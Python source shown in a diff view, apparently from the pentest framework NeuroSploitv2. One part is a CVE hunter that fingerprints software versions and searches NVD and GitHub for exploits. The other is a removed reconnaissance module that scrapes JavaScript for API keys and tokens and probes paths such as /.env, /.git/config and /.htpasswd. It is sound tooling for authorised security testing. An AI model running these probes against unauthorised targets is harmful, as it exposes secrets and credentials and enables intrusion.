def __init__(self, session=None, nvd_api_key=None, github_token=None):
self._external_session = session is not None
self._session = session
self._nvd_api_key = nvd_api_key
self._github_token = github_token
rpm = _NVD_RPM_WITH_KEY if nvd_api_key else _NVD_RPM_NO_KEY
self._nvd_min_interval = 60.0 / rpm
self._nvd_last_request: float = 0.0
async def _get_session(self) -> "aiohttp.ClientSession":
if aiohttp is None:
raise RuntimeError("aiohttp is required but not installed")
if self._session is None or self._session.closed:
self._session = aiohttp.ClientSession(
timeout=aiohttp.ClientTimeout(total=_REQUEST_TIMEOUT))
return self._session
async def close(self):
if not self._external_session and self._session and not self._session.closed:
await self._session.close()
# ── Version extraction ────────────────────────────────────────────
async def extract_versions(self, headers: Dict[str, str], body: str,
technologies: Optional[List[str]] = None) -> List[VersionInfo]:
seen: set[Tuple[str, str]] = set()
results: List[VersionInfo] = []
def _add(sw: str, ver: str, src: str):
key = (sw.lower(), ver)
if key not in seen:
seen.add(key)
results.append(VersionInfo(software=sw, version=ver, source=src))
# Server header
server = headers.get("server") or headers.get("Server") or ""
for m in _SERVER_TOKEN_RE.finditer(server):
_add(m.group(1), m.group(2), "server_header")
# X-Powered-By
xpb = headers.get("x-powered-by") or headers.get("X-Powered-By") or ""
for m in _SERVER_TOKEN_RE.finditer(xpb):
_add(m.group(1), m.group(2), "x_powered_by")
if xpb and not _SERVER_TOKEN_RE.search(xpb):
parts = xpb.strip().split("/", 1)
if len(parts) == 2 and re.match(r"\d", parts[1]):
_add(parts[0].strip(), parts[1].strip(), "x_powered_by")
# Meta generator tags
for m in _META_GENERATOR_RE.finditer(body):
gp = m.group(1).strip().rsplit(" ", 1)
if len(gp) == 2 and re.match(r"\d", gp[1]):
_add(gp[0], gp[1], "meta_generator")
# CMS-specific patterns
for m in _WP_VERSION_RE.finditer(body):
_add("WordPress", m.group(1), "body")
for m in _DRUPAL_VERSION_RE.finditer(body):
_add("Drupal", m.group(1), "body")
for m in _JOOMLA_VERSION_RE.finditer(body):
_add("Joomla", m.group(1), "body")
# JS libraries (jquery, react, angular, etc.)
for m in _JS_LIB_RE.finditer(body):
_add(m.group(1), m.group(2), "body")
# Generic "SoftwareName version X.Y.Z"
for m in _GENERIC_VERSION_RE.finditer(body):
_add(m.group(1), m.group(2), "body")
# Supplied technology list
for tech in (technologies or []):
tp = re.split(r"[\s/]+", tech.strip(), maxsplit=1)
if len(tp) == 2 and re.match(r"\d", tp[1]):
_add(tp[0], tp[1], "technology_list")
return [v for v in results if v.version]
# ── NVD search ────────────────────────────────────────────────────
async def _nvd_rate_limit(self):
elapsed = time.monotonic() - self._nvd_last_request
if elapsed < self._nvd_min_interval:
await asyncio.sleep(self._nvd_min_interval - elapsed)
self._nvd_last_request = time.monotonic()
async def search_nvd(self, software: str, version: str) -> List[CVEResult]:
"""Query NVD 2.0 API for CVEs matching software + version."""
session = await self._get_session()
await self._nvd_rate_limit()
params = {"keywordSearch": f"{software} {version}"}
hdrs: Dict[str, str] = {}
if self._nvd_api_key:
hdrs["apiKey"] = self._nvd_api_key
results: List[CVEResult] = []
try:
async with session.get("https://services.nvd.nist.gov/rest/json/cves/2.0",
params=params, headers=hdrs) as resp:
if resp.status == 403:
logger.warning("NVD rate limit hit (403). Backing off.")
await asyncio.sleep(30)
return results
if resp.status != 200:
logger.warning("NVD returned %d for %s %s", resp.status, software, version)
return results
data = await resp.json(content_type=None)
except asyncio.TimeoutError:
logger.warning("NVD request timed out for %s %s", software, version)
return results
except Exception as exc:
logger.warning("NVD request failed for %s %s: %s", software, version, exc)
return results
seen_ids: set[str] = set()
for item in data.get("vulnerabilities", []):
cve = item.get("cve", {})
cve_id = cve.get("id", "")
if not cve_id or cve_id in seen_ids:
continue
seen_ids.add(cve_id)
# CVSS: prefer v3.1 → v3.0 → v2
cvss_score, severity = 0.0, "UNKNOWN"
for mk in ("cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
ml = cve.get("metrics", {}).get(mk, [])
if ml:
cd = ml[0].get("cvssData", {})
cvss_score = cd.get("baseScore", 0.0)
severity = cd.get("baseSeverity", "UNKNOWN")
break
# English description
desc = next((d["value"] for d in cve.get("descriptions", [])
if d.get("lang") == "en"), "")
# CWE ID
cwe_id = ""
for w in cve.get("weaknesses", []):
for wd in w.get("description", []):
if wd.get("value", "").startswith("CWE-"):
cwe_id = wd["value"]
break
if cwe_id:
break
# Affected version ranges from configurations
vparts: List[str] = []
for cfg in cve.get("configurations", []):
for node in cfg.get("nodes", []):
for cm in node.get("cpeMatch", []):
vs = cm.get("versionStartIncluding", "")
ve = cm.get("versionEndIncluding", "")
vee = cm.get("versionEndExcluding", "")
if vs and ve: vparts.append(f"{vs}-{ve}")
elif vs and vee: vparts.append(f"{vs}-<{vee}")
elif ve: vparts.append(f"<={ve}")
elif vee: vparts.append(f"<{vee}")
results.append(CVEResult(
cve_id=cve_id, cvss_score=cvss_score, severity=severity.upper(),
description=desc[:500], cwe_id=cwe_id,
affected_versions=", ".join(vparts[:5]),
published_date=cve.get("published", "")[:10],
))
results.sort(key=lambda c: c.cvss_score, reverse=True)
return results
# ── GitHub exploit search ─────────────────────────────────────────
async def search_github_exploits(self, cve_id: str) -> List[ExploitResult]:
"""Search GitHub for public exploit repos matching a CVE ID."""
session = await self._get_session()
params = {"q": cve_id, "sort": "stars", "order": "desc", "per_page": "10"}
hdrs = {"Accept": "application/vnd.github.v3+json"}
if self._github_token:
hdrs["Authorization"] = f"token {self._github_token}"
results: List[ExploitResult] = []
try:
async with session.get("https://api.github.com/search/repositories",
params=params, headers=hdrs) as resp:
if resp.status != 200:
logger.warning("GitHub search returned %d for %s", resp.status, cve_id)
return results
data = await resp.json(content_type=None)
except asyncio.TimeoutError:
logger.warning("GitHub search timed out for %s", cve_id)
return results
except Exception as exc:
logger.warning("GitHub search failed for %s: %s", cve_id, exc)
return results
for repo in data.get("items", []):
results.append(ExploitResult(
source="github", url=repo.get("html_url", ""),
description=(repo.get("description") or "")[:300],
stars=repo.get("stargazers_count", 0),
language=repo.get("language") or "Unknown",
))
results.sort(key=lambda e: e.stars, reverse=True)
return results
# ── Full pipeline ─────────────────────────────────────────────────
async def hunt(self, headers: Dict[str, str], body: str,
technologies: Optional[List[str]] = None) -> List[CVEFinding]:
"""
Full pipeline: extract versions -> NVD lookup -> GitHub exploit search.
Returns findings sorted by highest CVSS score descending.
"""
versions = await self.extract_versions(headers, body, technologies or [])
if not versions:
logger.info("No software versions detected; nothing to hunt.")
return []
logger.info("Detected %d software versions, searching CVEs...", len(versions))
findings: List[CVEFinding] = []
seen_cves: set[str] = set()
for vi in versions:
cves = await self.search_nvd(vi.software, vi.version)
unique = [c for c in cves if c.cve_id not in seen_cves]
seen_cves.update(c.cve_id for c in unique)
if not unique:
continue
exploits: List[ExploitResult] = []
for c in unique:
exploits.extend(await self.search_github_exploits(c.cve_id))
findings.append(CVEFinding(version_info=vi, cves=unique, exploits=exploits))
findings.sort(key=lambda f: max((c.cvss_score for c in f.cves), default=0.0),
reverse=True)
logger.info("CVE hunt complete: %d findings, %d CVEs, %d exploits",
len(findings), sum(len(f.cves) for f in findings),
sum(len(f.exploits) for f in findings))
return findings
-977
View File
@@ -1,977 +0,0 @@
"""
Advanced reconnaissance module for NeuroSploitv2.
Performs deep JS analysis, sitemap/robots parsing, API enumeration,
source map parsing, framework-specific discovery, path fuzzing,
and technology fingerprinting using async HTTP requests.
"""
import re
import json
import asyncio
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
logger = logging.getLogger(__name__)
try:
import aiohttp
HAS_AIOHTTP = True
except ImportError:
HAS_AIOHTTP = False
try:
from xml.etree import ElementTree as ET
except ImportError:
ET = None
REQUEST_TIMEOUT = aiohttp.ClientTimeout(total=10) if HAS_AIOHTTP else None
MAX_JS_FILES = 30
MAX_JS_SIZE = 1024 * 1024 # 1 MB
MAX_SITEMAP_URLS = 500
MAX_SITEMAP_DEPTH = 3 # Recursive sitemap index depth
MAX_ENDPOINTS = 2000 # Global cap to prevent memory bloat
# --- Regex patterns for JS analysis ---
RE_API_ENDPOINT = re.compile(r'["\'](/api/v?\d*/[a-zA-Z0-9_/\-{}]+)["\']')
RE_RELATIVE_PATH = re.compile(r'["\'](/[a-zA-Z0-9_\-]+(?:/[a-zA-Z0-9_\-{}]+){1,6})["\']')
RE_FETCH_URL = re.compile(r'fetch\(\s*["\']([^"\']+)["\']')
RE_AXIOS_URL = re.compile(r'axios\.(?:get|post|put|patch|delete|request)\(\s*["\']([^"\']+)["\']')
RE_AJAX_URL = re.compile(r'\$\.ajax\(\s*\{[^}]*url\s*:\s*["\']([^"\']+)["\']', re.DOTALL)
RE_XHR_URL = re.compile(r'\.open\(\s*["\'][A-Z]+["\']\s*,\s*["\']([^"\']+)["\']')
RE_TEMPLATE_LITERAL = re.compile(r'`(/[a-zA-Z0-9_/\-]+\$\{[^}]+\}[a-zA-Z0-9_/\-]*)`')
RE_WINDOW_LOCATION = re.compile(r'(?:window\.location|location\.href)\s*=\s*["\']([^"\']+)["\']')
RE_FORM_ACTION = re.compile(r'action\s*[:=]\s*["\']([^"\']+)["\']')
RE_HREF_PATTERN = re.compile(r'href\s*[:=]\s*["\']([^"\']+)["\']')
RE_API_KEY = re.compile(
r'(?:sk-[a-zA-Z0-9]{20,}|pk_(?:live|test)_[a-zA-Z0-9]{20,}'
r'|AKIA[0-9A-Z]{16}'
r'|ghp_[a-zA-Z0-9]{36}'
r'|glpat-[a-zA-Z0-9\-]{20,}'
r'|eyJ[a-zA-Z0-9_-]{10,}\.[a-zA-Z0-9_-]{10,})'
)
RE_INTERNAL_URL = re.compile(
r'https?://(?:localhost|127\.0\.0\.1|10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)[^\s"\']*'
)
RE_REACT_ROUTE = re.compile(r'path\s*[:=]\s*["\'](/[^"\']*)["\']')
RE_ANGULAR_ROUTE = re.compile(r'path\s*:\s*["\']([^"\']+)["\']')
RE_VUE_ROUTE = re.compile(r'path\s*:\s*["\'](/[^"\']*)["\']')
RE_NEXTJS_PAGE = re.compile(r'"(/[a-zA-Z0-9_/\[\]\-]+)"')
# Source map patterns
RE_SOURCEMAP_URL = re.compile(r'//[#@]\s*sourceMappingURL\s*=\s*(\S+)')
RE_SOURCEMAP_ROUTES = re.compile(r'(?:pages|routes|views)/([a-zA-Z0-9_/\[\]\-]+)\.(?:tsx?|jsx?|vue|svelte)')
# GraphQL patterns
RE_GQL_QUERY = re.compile(r'(?:query|mutation|subscription)\s+(\w+)')
RE_GQL_FIELD = re.compile(r'gql\s*`[^`]*`', re.DOTALL)
# Parameter patterns in JS
RE_URL_PARAM = re.compile(r'[?&]([a-zA-Z0-9_]+)=')
RE_BODY_PARAM = re.compile(r'(?:body|data|params)\s*[:=]\s*\{([^}]+)\}', re.DOTALL)
RE_JSON_KEY = re.compile(r'["\']([a-zA-Z_][a-zA-Z0-9_]*)["\']')
@dataclass
class JSAnalysisResult:
"""Results from JavaScript file analysis."""
endpoints: List[str] = field(default_factory=list)
api_keys: List[str] = field(default_factory=list)
internal_urls: List[str] = field(default_factory=list)
secrets: List[str] = field(default_factory=list)
parameters: Dict[str, List[str]] = field(default_factory=dict)
source_map_routes: List[str] = field(default_factory=list)
@dataclass
class APISchema:
"""Parsed API schema from Swagger/OpenAPI or GraphQL introspection."""
endpoints: List[Dict] = field(default_factory=list)
version: str = ""
source: str = ""
@dataclass
class EndpointInfo:
"""Rich endpoint descriptor with method and parameter hints."""
url: str
method: str = "GET"
params: List[str] = field(default_factory=list)
source: str = "" # How this endpoint was discovered
priority: int = 5 # 1-10, higher = more interesting
def _normalize_url(url: str) -> str:
"""Canonicalize a URL for deduplication."""
parsed = urlparse(url)
path = parsed.path.rstrip("/") or "/"
# Normalize double slashes
while "//" in path:
path = path.replace("//", "/")
# Sort query parameters
if parsed.query:
params = parse_qs(parsed.query, keep_blank_values=True)
sorted_query = urlencode(sorted(params.items()), doseq=True)
return f"{parsed.scheme}://{parsed.netloc}{path}?{sorted_query}"
return f"{parsed.scheme}://{parsed.netloc}{path}"
class DeepRecon:
"""Advanced reconnaissance: JS analysis, sitemap, robots, API enum, fingerprinting."""
def __init__(self, session: Optional["aiohttp.ClientSession"] = None):
self._external_session = session is not None
self._session = session
self._seen_urls: Set[str] = set()
async def _get_session(self) -> "aiohttp.ClientSession":
if self._session is None or self._session.closed:
self._session = aiohttp.ClientSession(timeout=REQUEST_TIMEOUT)
self._external_session = False
return self._session
async def close(self):
if not self._external_session and self._session and not self._session.closed:
await self._session.close()
async def _fetch(self, url: str, max_size: int = 0) -> Optional[str]:
"""Fetch URL text with optional size limit. Returns None on any error."""
try:
session = await self._get_session()
async with session.get(url, ssl=False, allow_redirects=True) as resp:
if resp.status != 200:
return None
if max_size:
chunk = await resp.content.read(max_size)
return chunk.decode("utf-8", errors="replace")
return await resp.text()
except Exception:
return None
async def _head_check(self, url: str) -> Optional[int]:
"""Quick HEAD request to check if a URL exists. Returns status or None."""
try:
session = await self._get_session()
async with session.head(url, ssl=False, allow_redirects=True, timeout=aiohttp.ClientTimeout(total=5)) as resp:
return resp.status
except Exception:
return None
async def _check_url_alive(self, url: str, accept_codes: Set[int] = None) -> bool:
"""Check if URL returns an acceptable status code."""
if accept_codes is None:
accept_codes = {200, 201, 301, 302, 307, 308, 401, 403}
status = await self._head_check(url)
return status is not None and status in accept_codes
# ------------------------------------------------------------------
# JS file analysis (enhanced)
# ------------------------------------------------------------------
async def crawl_js_files(self, base_url: str, js_urls: List[str]) -> JSAnalysisResult:
"""Fetch and analyse JavaScript files for endpoints, keys, and secrets."""
result = JSAnalysisResult()
urls_to_scan = list(dict.fromkeys(js_urls))[:MAX_JS_FILES]
tasks = [self._fetch(urljoin(base_url, u), max_size=MAX_JS_SIZE) for u in urls_to_scan]
bodies = await asyncio.gather(*tasks, return_exceptions=True)
# Also try to fetch source maps in parallel
sourcemap_tasks = []
sourcemap_base_urls = []
for url, body in zip(urls_to_scan, bodies):
if not isinstance(body, str):
continue
sm = RE_SOURCEMAP_URL.search(body)
if sm:
sm_url = sm.group(1)
if not sm_url.startswith("data:"):
full_url = urljoin(urljoin(base_url, url), sm_url)
sourcemap_tasks.append(self._fetch(full_url, max_size=MAX_JS_SIZE * 2))
sourcemap_base_urls.append(full_url)
sourcemap_bodies = []
if sourcemap_tasks:
sourcemap_bodies = await asyncio.gather(*sourcemap_tasks, return_exceptions=True)
seen_endpoints: set = set()
seen_params: Dict[str, Set[str]] = {}
for body in bodies:
if not isinstance(body, str):
continue
self._extract_from_js(body, seen_endpoints, seen_params, result)
# Parse source maps for original file paths → route discovery
for sm_body in sourcemap_bodies:
if not isinstance(sm_body, str):
continue
try:
sm_data = json.loads(sm_body)
sources = sm_data.get("sources", [])
for src in sources:
m = RE_SOURCEMAP_ROUTES.search(src)
if m:
route = "/" + m.group(1).replace("[", "{").replace("]", "}")
result.source_map_routes.append(route)
seen_endpoints.add(route)
except (json.JSONDecodeError, ValueError):
# Not valid JSON source map — might still contain paths
for m in RE_SOURCEMAP_ROUTES.finditer(sm_body):
route = "/" + m.group(1).replace("[", "{").replace("]", "}")
result.source_map_routes.append(route)
seen_endpoints.add(route)
# Resolve endpoints relative to base_url
for ep in sorted(seen_endpoints):
if ep.startswith("http"):
resolved = ep
elif ep.startswith("/"):
resolved = urljoin(base_url, ep)
else:
continue
normalized = _normalize_url(resolved)
if normalized not in self._seen_urls:
self._seen_urls.add(normalized)
result.endpoints.append(resolved)
# Convert param sets
for endpoint, params in seen_params.items():
result.parameters[endpoint] = sorted(params)
return result
def _extract_from_js(
self, body: str, seen_endpoints: set, seen_params: Dict[str, Set[str]],
result: JSAnalysisResult,
):
"""Extract endpoints, params, keys, and internal URLs from a JS body."""
# API endpoint patterns (expanded)
for regex in (RE_API_ENDPOINT, RE_RELATIVE_PATH, RE_FETCH_URL, RE_AXIOS_URL,
RE_AJAX_URL, RE_XHR_URL, RE_TEMPLATE_LITERAL, RE_WINDOW_LOCATION,
RE_FORM_ACTION, RE_HREF_PATTERN):
for m in regex.finditer(body):
ep = m.group(1) if regex.groups else m.group(0)
# Filter out obvious non-endpoints
if self._is_valid_endpoint(ep):
seen_endpoints.add(ep)
# Route definitions (React Router, Angular, Vue Router, Next.js)
for regex in (RE_REACT_ROUTE, RE_ANGULAR_ROUTE, RE_VUE_ROUTE, RE_NEXTJS_PAGE):
for m in regex.finditer(body):
route = m.group(1)
if route.startswith("/") and len(route) < 200:
seen_endpoints.add(route)
# Extract URL parameters
for m in RE_URL_PARAM.finditer(body):
param_name = m.group(1)
# Find the URL this param belongs to (rough heuristic)
start = max(0, m.start() - 200)
context = body[start:m.start()]
for ep_regex in (RE_FETCH_URL, RE_API_ENDPOINT):
ep_match = ep_regex.search(context)
if ep_match:
ep = ep_match.group(1) if ep_regex.groups else ep_match.group(0)
if ep not in seen_params:
seen_params[ep] = set()
seen_params[ep].add(param_name)
# Extract JSON body parameters
for m in RE_BODY_PARAM.finditer(body):
block = m.group(1)
for key_m in RE_JSON_KEY.finditer(block):
key = key_m.group(1)
if len(key) <= 50 and not key.startswith("__"):
if "_body_params" not in seen_params:
seen_params["_body_params"] = set()
seen_params["_body_params"].add(key)
# API keys / tokens
for m in RE_API_KEY.finditer(body):
val = m.group(0)
if val not in result.api_keys:
result.api_keys.append(val)
result.secrets.append(val)
# Internal / private URLs
for m in RE_INTERNAL_URL.finditer(body):
val = m.group(0)
if val not in result.internal_urls:
result.internal_urls.append(val)
@staticmethod
def _is_valid_endpoint(ep: str) -> bool:
"""Filter out non-endpoint matches (CSS, images, data URIs, etc.)."""
if not ep or len(ep) > 500:
return False
if ep.startswith(("data:", "javascript:", "mailto:", "tel:", "#", "blob:")):
return False
# Skip common static assets
SKIP_EXT = ('.css', '.png', '.jpg', '.jpeg', '.gif', '.svg', '.ico', '.woff',
'.woff2', '.ttf', '.eot', '.mp4', '.mp3', '.webp', '.avif',
'.map', '.ts', '.tsx', '.jsx', '.scss', '.less', '.pdf')
lower = ep.lower()
if any(lower.endswith(ext) for ext in SKIP_EXT):
return False
# Must look like a path
if ep.startswith("/") or ep.startswith("http"):
return True
return False
# ------------------------------------------------------------------
# Sitemap parsing (enhanced with recursive index following)
# ------------------------------------------------------------------
async def parse_sitemap(self, target: str) -> List[str]:
"""Fetch and parse sitemap XML files for URLs. Follows sitemap indexes recursively."""
target = target.rstrip("/")
candidates = [
f"{target}/sitemap.xml",
f"{target}/sitemap_index.xml",
f"{target}/sitemap1.xml",
f"{target}/sitemap-index.xml",
f"{target}/sitemaps.xml",
f"{target}/post-sitemap.xml",
f"{target}/page-sitemap.xml",
f"{target}/category-sitemap.xml",
]
# Also check robots.txt for sitemap directives
robots_body = await self._fetch(f"{target}/robots.txt")
if robots_body:
for line in robots_body.splitlines():
line = line.strip()
if line.lower().startswith("sitemap:"):
sm_url = line.split(":", 1)[1].strip()
if sm_url and sm_url not in candidates:
candidates.append(sm_url)
urls: set = set()
visited_sitemaps: set = set()
async def _parse_one(sitemap_url: str, depth: int = 0):
if depth > MAX_SITEMAP_DEPTH or sitemap_url in visited_sitemaps:
return
if len(urls) >= MAX_SITEMAP_URLS:
return
visited_sitemaps.add(sitemap_url)
body = await self._fetch(sitemap_url)
if not body or ET is None:
return
try:
root = ET.fromstring(body)
except ET.ParseError:
return
sub_sitemaps = []
for elem in root.iter():
tag = elem.tag.split("}")[-1] if "}" in elem.tag else elem.tag
if tag == "loc" and elem.text:
loc = elem.text.strip()
# Check if this is a sub-sitemap
if loc.endswith(".xml") or "sitemap" in loc.lower():
sub_sitemaps.append(loc)
else:
urls.add(loc)
if len(urls) >= MAX_SITEMAP_URLS:
return
# Recursively follow sub-sitemaps
for sub in sub_sitemaps[:10]: # Limit sub-sitemap recursion
await _parse_one(sub, depth + 1)
# Parse all candidate sitemaps
for sitemap_url in candidates:
if len(urls) >= MAX_SITEMAP_URLS:
break
await _parse_one(sitemap_url)
return sorted(urls)[:MAX_SITEMAP_URLS]
# ------------------------------------------------------------------
# Robots.txt parsing (enhanced with Sitemap extraction)
# ------------------------------------------------------------------
async def parse_robots(self, target: str) -> Tuple[List[str], List[str]]:
"""Parse robots.txt. Returns (paths, sitemap_urls)."""
target = target.rstrip("/")
body = await self._fetch(f"{target}/robots.txt")
if not body:
return [], []
paths: set = set()
sitemaps: list = []
for line in body.splitlines():
line = line.strip()
if line.startswith("#") or ":" not in line:
continue
directive, _, value = line.partition(":")
directive = directive.strip().lower()
value = value.strip()
if directive in ("disallow", "allow") and value and value != "/":
resolved = urljoin(target + "/", value)
paths.add(resolved)
elif directive == "sitemap" and value:
sitemaps.append(value)
return sorted(paths), sitemaps
# ------------------------------------------------------------------
# API enumeration (Swagger / OpenAPI / GraphQL / WADL / AsyncAPI)
# ------------------------------------------------------------------
_API_DOC_PATHS = [
"/swagger.json",
"/openapi.json",
"/api-docs",
"/v2/api-docs",
"/v3/api-docs",
"/swagger/v1/swagger.json",
"/swagger/v2/swagger.json",
"/.well-known/openapi",
"/api/swagger.json",
"/api/openapi.json",
"/api/v1/swagger.json",
"/api/v1/openapi.json",
"/api/docs",
"/docs/api",
"/doc.json",
"/public/swagger.json",
"/swagger-ui/swagger.json",
"/api-docs.json",
"/api/api-docs",
"/_api/docs",
]
_GRAPHQL_PATHS = [
"/graphql",
"/graphiql",
"/api/graphql",
"/v1/graphql",
"/gql",
"/query",
]
async def enumerate_api(self, target: str, technologies: List[str]) -> APISchema:
"""Discover and parse API documentation (OpenAPI/Swagger, GraphQL, WADL)."""
target = target.rstrip("/")
schema = APISchema()
# Try OpenAPI / Swagger endpoints (parallel batch)
api_tasks = [self._fetch(f"{target}{path}") for path in self._API_DOC_PATHS]
api_results = await asyncio.gather(*api_tasks, return_exceptions=True)
for path, body in zip(self._API_DOC_PATHS, api_results):
if not isinstance(body, str):
continue
try:
doc = json.loads(body)
except (json.JSONDecodeError, ValueError):
continue
if "paths" in doc or "openapi" in doc or "swagger" in doc:
schema.version = doc.get("openapi", doc.get("info", {}).get("version", ""))
schema.source = path
for route, methods in doc.get("paths", {}).items():
if not isinstance(methods, dict):
continue
for method, detail in methods.items():
if method.lower() in ("get", "post", "put", "patch", "delete", "options", "head"):
params = []
if isinstance(detail, dict):
for p in detail.get("parameters", []):
if isinstance(p, dict):
params.append(p.get("name", ""))
# Also extract request body schema params
req_body = detail.get("requestBody", {})
if isinstance(req_body, dict):
content = req_body.get("content", {})
for ct, ct_detail in content.items():
if isinstance(ct_detail, dict):
props = ct_detail.get("schema", {}).get("properties", {})
if isinstance(props, dict):
params.extend(props.keys())
schema.endpoints.append({
"url": route,
"method": method.upper(),
"params": [p for p in params if p],
})
logger.info(f"[DeepRecon] Found API schema at {path}: {len(schema.endpoints)} endpoints")
return schema
# GraphQL introspection (try multiple paths)
for gql_path in self._GRAPHQL_PATHS:
introspection = await self._graphql_introspect(f"{target}{gql_path}")
if introspection:
return introspection
return schema
async def _graphql_introspect(self, gql_url: str) -> Optional[APISchema]:
"""Attempt GraphQL introspection query at a specific URL."""
query = '{"query":"{ __schema { queryType { name } mutationType { name } types { name kind fields { name args { name type { name } } } } } }"}'
try:
session = await self._get_session()
headers = {"Content-Type": "application/json"}
async with session.post(
gql_url, data=query, headers=headers, ssl=False,
timeout=aiohttp.ClientTimeout(total=8),
) as resp:
if resp.status != 200:
return None
data = await resp.json()
except Exception:
return None
if "data" not in data or "__schema" not in data.get("data", {}):
return None
parsed_url = urlparse(gql_url)
source_path = parsed_url.path
schema = APISchema(version="graphql", source=source_path)
for type_info in data["data"]["__schema"].get("types", []):
type_name = type_info.get("name", "")
if type_name.startswith("__") or type_info.get("kind") in ("SCALAR", "ENUM", "INPUT_OBJECT"):
continue
for fld in type_info.get("fields", []) or []:
params = [a["name"] for a in fld.get("args", []) if isinstance(a, dict)]
schema.endpoints.append({
"url": f"/{type_name}/{fld['name']}",
"method": "QUERY",
"params": params,
})
return schema if schema.endpoints else None
# ------------------------------------------------------------------
# Framework-specific endpoint discovery
# ------------------------------------------------------------------
_FRAMEWORK_PATHS: Dict[str, List[str]] = {
"wordpress": [
"/wp-admin/", "/wp-login.php", "/wp-json/wp/v2/posts",
"/wp-json/wp/v2/users", "/wp-json/wp/v2/pages",
"/wp-json/wp/v2/categories", "/wp-json/wp/v2/comments",
"/wp-json/wp/v2/media", "/wp-json/wp/v2/tags",
"/wp-json/", "/wp-content/uploads/",
"/wp-cron.php", "/xmlrpc.php", "/?rest_route=/wp/v2/users",
"/wp-admin/admin-ajax.php", "/wp-admin/load-scripts.php",
"/wp-includes/wlwmanifest.xml",
],
"laravel": [
"/api/user", "/api/login", "/api/register",
"/sanctum/csrf-cookie", "/telescope",
"/horizon", "/nova-api/", "/_debugbar/open",
"/storage/logs/laravel.log", "/env",
],
"django": [
"/admin/", "/admin/login/", "/api/",
"/__debug__/", "/static/admin/",
"/accounts/login/", "/accounts/signup/",
"/api/v1/", "/api/v2/",
],
"spring": [
"/actuator", "/actuator/health", "/actuator/env",
"/actuator/beans", "/actuator/mappings", "/actuator/info",
"/actuator/configprops", "/actuator/metrics",
"/swagger-ui.html", "/swagger-ui/index.html",
"/api-docs", "/v3/api-docs",
],
"express": [
"/api/", "/api/v1/", "/api/health",
"/api/status", "/auth/login", "/auth/register",
"/graphql",
],
"aspnet": [
"/_blazor", "/swagger", "/swagger/index.html",
"/api/values", "/api/health",
"/Identity/Account/Login", "/Identity/Account/Register",
],
"rails": [
"/rails/info", "/rails/mailers",
"/api/v1/", "/admin/",
"/users/sign_in", "/users/sign_up",
"/assets/application.js",
],
"nextjs": [
"/_next/data/", "/api/", "/api/auth/session",
"/api/auth/signin", "/api/auth/providers",
"/_next/static/chunks/",
],
"flask": [
"/api/", "/api/v1/", "/admin/",
"/static/", "/auth/login", "/auth/register",
"/swagger.json",
],
}
# Common hidden paths to check regardless of framework
_COMMON_HIDDEN_PATHS = [
"/.env", "/.git/config", "/.git/HEAD",
"/backup/", "/backups/", "/backup.sql", "/backup.zip",
"/config.json", "/config.yaml", "/config.yml",
"/debug/", "/debug/vars", "/debug/pprof",
"/internal/", "/internal/health", "/internal/status",
"/metrics", "/prometheus", "/health", "/healthz", "/ready",
"/status", "/ping", "/version", "/info",
"/.well-known/security.txt", "/security.txt",
"/crossdomain.xml", "/clientaccesspolicy.xml",
"/server-status", "/server-info",
"/phpinfo.php", "/info.php",
"/web.config", "/WEB-INF/web.xml",
"/console/", "/manage/", "/management/",
"/api/debug", "/api/config",
"/trace", "/jolokia/",
"/cgi-bin/", "/fcgi-bin/",
"/.htaccess", "/.htpasswd",
]
async def discover_framework_endpoints(
self, target: str, technologies: List[str]
) -> List[EndpointInfo]:
"""Probe framework-specific endpoints based on detected technologies."""
target = target.rstrip("/")
tech_lower = [t.lower() for t in technologies]
endpoints: List[EndpointInfo] = []
urls_to_check: List[Tuple[str, str, int]] = [] # (url, source, priority)
# Match frameworks by technology signatures
fw_matches = set()
for fw_name, keywords in {
"wordpress": ["wordpress", "wp-", "woocommerce"],
"laravel": ["laravel", "php", "lumen"],
"django": ["django", "python", "wagtail"],
"spring": ["spring", "java", "tomcat", "wildfly", "jetty"],
"express": ["express", "node", "koa", "fastify"],
"aspnet": ["asp.net", ".net", "blazor", "iis"],
"rails": ["ruby", "rails", "rack"],
"nextjs": ["next.js", "nextjs", "react", "vercel"],
"flask": ["flask", "python", "gunicorn", "werkzeug"],
}.items():
for kw in keywords:
for tech in tech_lower:
if kw in tech:
fw_matches.add(fw_name)
break
# Add framework-specific paths
for fw in fw_matches:
for path in self._FRAMEWORK_PATHS.get(fw, []):
urls_to_check.append((f"{target}{path}", f"framework:{fw}", 7))
# Always check common hidden paths
for path in self._COMMON_HIDDEN_PATHS:
urls_to_check.append((f"{target}{path}", "common_hidden", 6))
# Batch check existence (parallel HEAD requests)
check_tasks = [self._check_url_alive(url) for url, _, _ in urls_to_check]
results = await asyncio.gather(*check_tasks, return_exceptions=True)
for (url, source, priority), alive in zip(urls_to_check, results):
if alive is True:
endpoints.append(EndpointInfo(
url=url, method="GET", source=source, priority=priority,
))
logger.info(f"[DeepRecon] Framework discovery: {len(endpoints)}/{len(urls_to_check)} alive")
return endpoints
# ------------------------------------------------------------------
# Path pattern fuzzing
# ------------------------------------------------------------------
async def fuzz_api_patterns(
self, target: str, known_endpoints: List[str]
) -> List[EndpointInfo]:
"""Infer and test related endpoints from discovered patterns."""
target = target.rstrip("/")
target_parsed = urlparse(target)
target_origin = f"{target_parsed.scheme}://{target_parsed.netloc}"
inferred: Set[str] = set()
# Extract API path patterns
api_bases: Set[str] = set()
api_resources: Set[str] = set()
for ep in known_endpoints:
parsed = urlparse(ep)
path = parsed.path
# Identify API base paths like /api/v1, /api/v2
m = re.match(r'(/api(?:/v\d+)?)', path)
if m:
api_bases.add(m.group(1))
# Extract resource name
rest = path[len(m.group(1)):]
parts = [p for p in rest.split("/") if p and not p.isdigit() and not re.match(r'^[0-9a-f-]{8,}$', p)]
if parts:
api_resources.add(parts[0])
# Common REST resource names to try
COMMON_RESOURCES = [
"users", "user", "auth", "login", "register", "logout",
"profile", "settings", "admin", "posts", "articles",
"comments", "categories", "tags", "search", "upload",
"files", "images", "media", "notifications", "messages",
"products", "orders", "payments", "invoices", "customers",
"dashboard", "reports", "analytics", "logs", "events",
"webhooks", "tokens", "sessions", "roles", "permissions",
"config", "health", "status", "version", "docs",
]
# Common REST sub-patterns
CRUD_SUFFIXES = [
"", "/1", "/me", "/all", "/list", "/search",
"/count", "/export", "/import", "/bulk",
]
for base in api_bases:
